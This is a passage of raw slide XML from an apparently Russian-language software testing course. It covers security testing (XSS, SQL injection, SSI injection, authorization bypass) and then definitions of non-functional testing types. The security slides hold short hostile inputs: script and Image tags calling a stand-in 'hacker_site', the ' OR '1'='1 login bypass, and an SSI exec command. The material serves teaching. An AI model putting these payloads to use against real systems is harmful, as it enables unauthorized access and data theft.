              <a:t>SCRIPT SRC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>"http://hacker_site/?command"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> объект </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Image</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>(); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>foo.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = "http://hacker_site/?command"; &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>injections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> (SQL, PHP, ASP и т.д.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Вставки исполняемого кода рассмотрим на примере кода SQL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Форма входа в систему имеет 2 поля - имя и пароль. Обработка происходит в базе данных через выполнение SQL запроса:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>testpass';Вводим</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> корректное имя ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>’, а в поле пароль вводим строку:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>testpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>' OR '1'='1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>В итоге, Если поле не имеет соответствующих </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>валидаций</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> или обработчиков данных, может вскрыться уязвимость, позволяющая зайти в защищенную паролем систему, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>т.к.SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> запрос примет следующий вид:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>testpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>' OR '1'='1';Условие '1'='1' всегда будет истинным и поэтому SQL запрос всегда будет возвращать много значений.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Server-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Includes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> (SSI) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>В зависимости от типа операционной системы команды могут быть разными, как пример рассмотрим команду, которая выводит на экран список файлов в OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&lt; !--#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>" --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Bypass</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Пользователь А может получить доступ к документам пользователя Б. Допустим, есть реализация, где при просмотре своего профиля, содержащего </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>конфеденциальную</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> информацию, в URL страницы передается </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>userID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, а данном случае есть смысл попробовать подставить вместо своего </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>userID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> номер другого пользователя. И если вы увидите его данные, значит вы нашли дефект.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU"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Нефункциональное тестирование включает, но не ограничивается, нагрузочное тестирование, тестирование производительности, стресс-тестирование, тестирование удобства использования, тестирование восстановления, тестирование надежности и тестирование переносимости. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Это тестирование того, «как» система работает. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Нефункциональное тестирование может выполняться на всех уровнях тестирования. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Термин нефункциональное тестирование описывает тесты, необходимые для оценки характеристик систем и программ, которые могут быть количественно измерены, такие как время отклика при тестировании производительности. Эти тесты могут ссылаться на модели качества, такие как «Разработка программного обеспечения – Качество программного продукта» (ISO 9126). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Нефункциональное тестирование рассматривает внешнее поведение программного обеспечения и в большинстве случаев использует разработку тестов методом черного ящика. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Нагрузочное</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> тестирование (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>load testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) – вид тестирование производительности, проводимый с целью оценить поведение компонента или системы под увеличивающейся нагрузкой (число одновременно работающих пользователей </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>и\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> или число транзакций) для определения максимально допустимого уровня нагрузки для исследуемого компонента или системы.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Тестирование производительности (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>performance testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>– процесс тестирования с целью определить производительность программного продукта. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Стресс тестирование (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>stress testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> - вид тестирования производительности, оценивающий систему или компонент на различных граничных значениях рабочих нагрузок или за их пределами, или же в состоянии ограниченных ресурсов, таких как память или доступ к серверу.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Тестирование удобства использования (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>usability testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) - это метод тестирования, направленный на установление степени удобства использования, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>обучаемости</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, понятности и привлекательности для пользователей разрабатываемого продукта в контексте заданных условий.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Тестирование удобства пользования дает оценку уровня удобства использования приложения по следующим пунктам:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>производительность, эффективность</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>efficiency</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) - сколько времени и шагов понадобится пользователю для завершения основных задач приложения, например, размещение новости, регистрации, покупка и т.д.? (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
              <a:t>меньше - лучше</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>правильность</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>accuracy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) - сколько ошибок сделал пользователь во время работы с приложением? (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
              <a:t>меньше - лучше</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>активизация в памяти</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>recall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) – как много пользователь помнит о работе приложения после приостановки работы с ним на длительный период времени? (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
              <a:t>повторное выполнение операций после перерыва должно проходить быстрее чем у нового пользователя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>эмоциональная реакция</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>emotional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) – как пользователь себя чувствует после завершения задачи - растерян, испытал стресс? Порекомендует ли пользователь систему своим друзьям? (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
              <a:t>положительная реакция - лучше</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Тестирование </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>сопровождаемости</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>maintainability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Сопровождаемость</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>аспект качества в большей степени не внешний, а внутренний.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Он важен не столько конечным пользователям, не столько потребителям программы, сколько самим разработчикам и ее </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>тестировщикам</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Все его </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>подхарактеристики</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> тестированию практически не поддаются, и для них применяются какие-то другие способы контроля качества, как правило, аналитические. Статический анализ кода, код </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>ревью</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, анализ документации и так далее.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Тестирование переносимости (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>portability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) – тестирование с целью определить переносимость ПО.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Программа должна уметь работать в различных окружениях (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>adaptibility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>), она должна быть достаточно </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>проста в установке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>installability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>), она должна </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>работать одновременно с другими программами</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> и не мешать им (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>coexistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>), и они должны не мешать ей, конечно же.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>И, наконец, хорошая программа должна предоставлять возможность пользователю перейти с какого-то другого аналогичного программного обеспечения на использование этой программы – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>замена другого ПО данным</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>replaceability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>). То есть предоставить какие-то возможности по миграции, чаще всего по миграции данных.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reliability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>testting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(тестирование надежности)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>К надежности относятся такие </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>подхарактеристики</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, как </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>зрелость </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
